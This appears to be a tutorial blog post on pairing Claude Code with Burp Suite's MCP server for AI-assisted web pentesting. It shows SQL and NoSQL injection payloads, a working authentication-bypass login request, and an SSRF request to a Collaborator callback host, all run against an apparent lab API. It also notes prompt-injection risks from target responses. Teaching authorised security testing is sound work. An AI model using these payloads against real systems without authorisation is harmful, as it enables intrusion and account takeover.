AI-Assisted Web Pentesting: Claude Code + Burp MCP

What is Burp MCP

Burp MCP connects Claude to Burp Suite. You ask Claude to find things in your proxy history, send HTTP requests, create Repeater tabs, and work with Intruder — all through plain English.

Instead of scrolling through hundreds of proxy entries looking for something interesting, you just ask. Instead of building test cases one by one, you describe what you want and let Claude generate them.

Why AI in Pentesting

Security testing has a lot of repetition. The same parameter fuzzing across dozens of endpoints. The same auth bypass attempts. The same Collaborator checks. AI handles this well because it can:

• Spot patterns in HTTP traffic that suggest vulnerabilities
• Build and run test cases without you typing each one
• Read responses and flag anomalies worth investigating
• Write up findings with evidence

Setup

1. Install Burp MCP

Go to Extensions → BApp Store → Search for “MCP Server” and click Install. Then go to the MCP tab to see the server configuration.

2. Connect to Claude Code

Add Burp MCP to your Claude Code config. Create a file named .mcp.json:

{
  "mcpServers": {
    "burp-mcp": {
      "command": "java",
      "args": [
        "-jar",
        "/path/to/mcp-proxy.jar",
        "--sse-url",
        "http://127.0.0.1:9876"
      ]
    }
  }
}

mcp-proxy.jar can be extracted via the MCP tab in Burp.

3. Claude Code vs Claude Desktop

Claude Code runs in your terminal. That matters because you get:

• File operations — read and write reports, configs, payloads
• Shell commands — run curl, nmap, or your own scripts
• Custom skills — reusable workflows for attack patterns
• Persistent memory — context sticks around between sessions

Claude Desktop works fine for quick questions. But for actual pentesting, you need the terminal.

4. Create CLAUDE.md

Add a project context file so Claude knows your setup:

# Pentest Project

## Target Scope
- *.example.com
- api.example.com:443

## Application Context
- **Target:** E-commerce API for ACME Corp
- **Auth Flow:** JWT-based authentication, refresh tokens expire in 7 days
- **User Roles:** Guest, Customer, Admin (test accounts available)
- **Business Logic:** Cart -> Checkout -> Payment (Stripe integration)
- **Stack:** Python/FastAPI backend, PostgreSQL, Redis cache
- **Known Issues:** Legacy endpoints at /api/v1/ still active

## Tools Available
- Burp Suite Professional
- burp-mcp extension loaded

## Output
- Save reports to ./reports/
- Use markdown format

Claude reads this at the start of each session and works within your scope.

Burp MCP Tools Reference

Category	Tool	Description
Encoding	base64_decode / base64_encode	Encode or decode Base64 strings
Encoding	url_decode / url_encode	Encode or decode URL strings
HTTP	send_http1_request / send_http2_request	Send HTTP requests
HTTP	create_repeater_tab	Create a Repeater tab with a request
HTTP	send_to_intruder	Send a request to Intruder
Proxy	get_proxy_http_history	View proxy HTTP history
Proxy	get_proxy_http_history_regex	Search proxy HTTP history
Proxy	get_proxy_websocket_history	View WebSocket history
Proxy	set_proxy_intercept_state	Toggle proxy intercept
Collaborator	generate_collaborator_payload	Generate OOB testing payload
Collaborator	get_collaborator_interactions	Poll for OOB interactions
Scanner	get_scanner_issues	View scanner issues
Editor	get_active_editor_contents	Get active editor contents
Config	output_project_options / set_project_options	Export or update project config

Use Cases

Filtering Important API Endpoints

Skip the manual scrolling through hundreds of proxy entries. Ask Claude to find endpoints that matter.

Prompt:

Get all the parametered requests from burp history

What happens:

• Claude calls get_proxy_http_history_regex to filter for requests with query parameters
• Reads each request for Content-Type, parameters, and path patterns
• Returns a filtered list with auth requirements

Example output:

GET Requests with Parameters:
| Endpoint                          | Parameter | Auth Required |
|-----------------------------------|-----------|---------------|
| GET /api/getNote?username=user    | username  | Bearer Token  |
| GET /api/getSolves                | none      | Bearer Token  |
| GET /api/profile                  | none      | Bearer Token  |

POST Requests (with JSON body):
| Endpoint                 | Auth Required |
|--------------------------|---------------|
| POST /api/login          | No            |
| POST /api/register       | No            |
| POST /api/addNote        | Bearer Token  |
| POST /api/addNoteWithLink| Bearer Token  |

Generating Test Cases for an Endpoint

Ask Claude to generate test cases for a specific endpoint — SQL injection, NoSQL injection, IDOR, rate limiting, whatever makes sense.

Prompt:

Generate SQLi test case on login endpoint

What happens:

• Claude spots Express.js headers (likely Node.js/MongoDB backend)
• Generates both SQL injection and NoSQL injection payloads
• Creates separate Repeater tabs for each payload
• Tests payloads directly and reports results

Example results:

Created 6 SQLi test cases in Burp Repeater:
| Tab Name                    | Payload Type    | Description                  |
|-----------------------------|-----------------|------------------------------|
| SQLi Login - Basic          | '--             | Comment out password check   |
| SQLi Login - OR True        | ' OR '1'='1    | Classic boolean-based SQLi   |
| SQLi Login - Comment Bypass | '/* and */      | MySQL comment bypass         |
| SQLi Login - UNION Select   | UNION SELECT    | Data extraction attempt      |
| SQLi Login - NoSQL Injection| {"$ne":null}    | MongoDB not-equal bypass     |
| SQLi Login - NoSQL Regex    | {"$regex":".*"} | MongoDB regex bypass         |

Testing Results:
| Test             | Payload         | Status | Result                       |
|------------------|-----------------|--------|------------------------------|
| SQLi - Comment   | admin'--        | 400    | Blocked                      |
| SQLi - OR True   | ' OR '1'='1    | 400    | Blocked                      |
| NoSQL - $gt      | {"$gt":""}      | 200    | BYPASS - Logged in as Alice  |
| NoSQL - $gt filt | {"$gt":"B"}     | 200    | BYPASS - Logged in as Bob    |

Working Exploit:

POST /api/login
Content-Type: application/json

{"username":{"$gt":""},"password":{"$gt":""}}

Creating Repeater Tabs for Manual Follow-Up

Some findings need manual validation. Ask Claude to prepare Repeater tabs with ready-to-send requests, then take over manually.

Prompt:

Create a Repeater tab for SQL test cases with the following payloads ready to test

Claude calls create_repeater_tab with the target host, port, and request content. Repeater tabs appear in Burp with requests pre-configured. You click Send when ready.

Running SSRF Tests with Collaborator

When you need to run out-of-band detection, Claude handles the whole workflow: generate Collaborator payload, send the request, poll for interactions, report findings.

Prompt:

Do a SSRF test on POST /api/addNoteWithLink, use collaborator payload and check for the interaction

What happens:

1. Claude generates a Collaborator payload via generate_collaborator_payload
2. Sends a POST request with the payload in the target parameter
3. Polls for interactions using get_collaborator_interactions
4. Reports any DNS, HTTP, or SMTP callbacks with evidence

Example flow:

Payload: 727j8xszmwaixgagv87lzvozqqwgk5.oastify.com

POST /api/addNoteWithLink HTTP/1.1
Host: vulnerable-api.com:3000
Content-Type: application/json
Authorization: Bearer <token>

{"url":"http://727j8xszmwaixgagv87lzvozqqwgk5.oastify.com"}

Interaction Received:
  Type: DNS
  Timestamp: 2026-03-03T18:01:25.243Z
  Client IP: 182.8.64.0
  Query Type: A record

Vulnerability Confirmed: SSRF - The server made an outbound DNS request.

Generating a Findings Report

At the end of a session, have Claude compile everything into a structured report.

Prompt:

Summarize all vulnerabilities found in this session

Claude writes a markdown file with:

• Severity classification
• Evidence and proof of concept
• Remediation steps
• All discovered API endpoints and auth details

Example output:

# Burp MCP Session Report
**Date:** 2026-03-04
**Target:** vulnerable-api.com:3000

## 1. NoSQL Injection (High)
**Endpoint:** POST /api/login
**Exploit:** {"username":{"$gt":""},"password":{"$gt":""}}
**Impact:** Authentication bypass, user enumeration
**Remediation:** Validate input as strings, use schema enforcement

## 2. SSRF (High)
**Endpoint:** POST /api/addNoteWithLink
**Parameter:** url
**Evidence:** Collaborator DNS callback from 182.8.64.0
**Remediation:** URL allowlist, block private IP ranges

| Vulnerability      | Severity | Status    |
|--------------------|----------|-----------|
| NoSQL Injection    | High     | Confirmed |
| SSRF               | High     | Confirmed |

Analyzing JavaScript for Secrets

Claude can read HTTP responses to find API endpoints, secrets, or sensitive logic hidden in JavaScript files.

Prompt:

Search proxy history for JavaScript files and analyze them for hardcoded endpoints or API keys

Claude filters for .js files in proxy history, reads response bodies, and pattern-matches for endpoints, keys, and sensitive data.

Security Considerations

Tool Poisoning Risk: HTTP responses from target applications may contain prompt injection attempts. Claude could execute malicious instructions from response bodies.

Mitigations:

• Enable “Require approval for history access” in Burp MCP settings
• Review Claude’s proposed actions before execution
• Restrict AI operations to authorized targets via CLAUDE.md scope
• Always approve tool calls that send requests or modify Burp state — the AI suggests, you decide

What Could Be Better

Payload Libraries Integration

Connect wordlist and payload sources directly:

• SecLists MCP — Access wordlists for fuzzing without downloading files
• PayloadsAllTheThings — Reference for injection payloads across contexts
• Custom wordlist files — Load project-specific payloads from local files

Custom Skills for Specific Attacks

Build Claude Code skills that combine tools and knowledge for specialized testing:

• JWT Pentest Skill — Decode tokens, check for algorithm confusion, test for weak secrets
• GraphQL Security Skill — Introspection queries, batching abuse, field suggestion info disclosure
• Deserialization Attack Skill — Generate payloads for Java, PHP, Python serialization
• API Authorization Testing Skill — Map endpoints, test privilege escalation, generate IDOR payloads

Workflow Automation

• Session templates — Pre-defined testing workflows for different app types
• Finding templates — Standardized report formats for compliance requirements
• Repeater organization — Auto-group tabs by vulnerability type or endpoint

Conclusion

Burp MCP turns Claude into a pentesting assistant that reads your proxy traffic, builds test cases, runs them, and documents results. The AI handles the repetitive work; you focus on the interesting vulnerabilities.

---

Based on research by Muh. Fani Akbar (SecEngAI). Original source: labs.secengai.com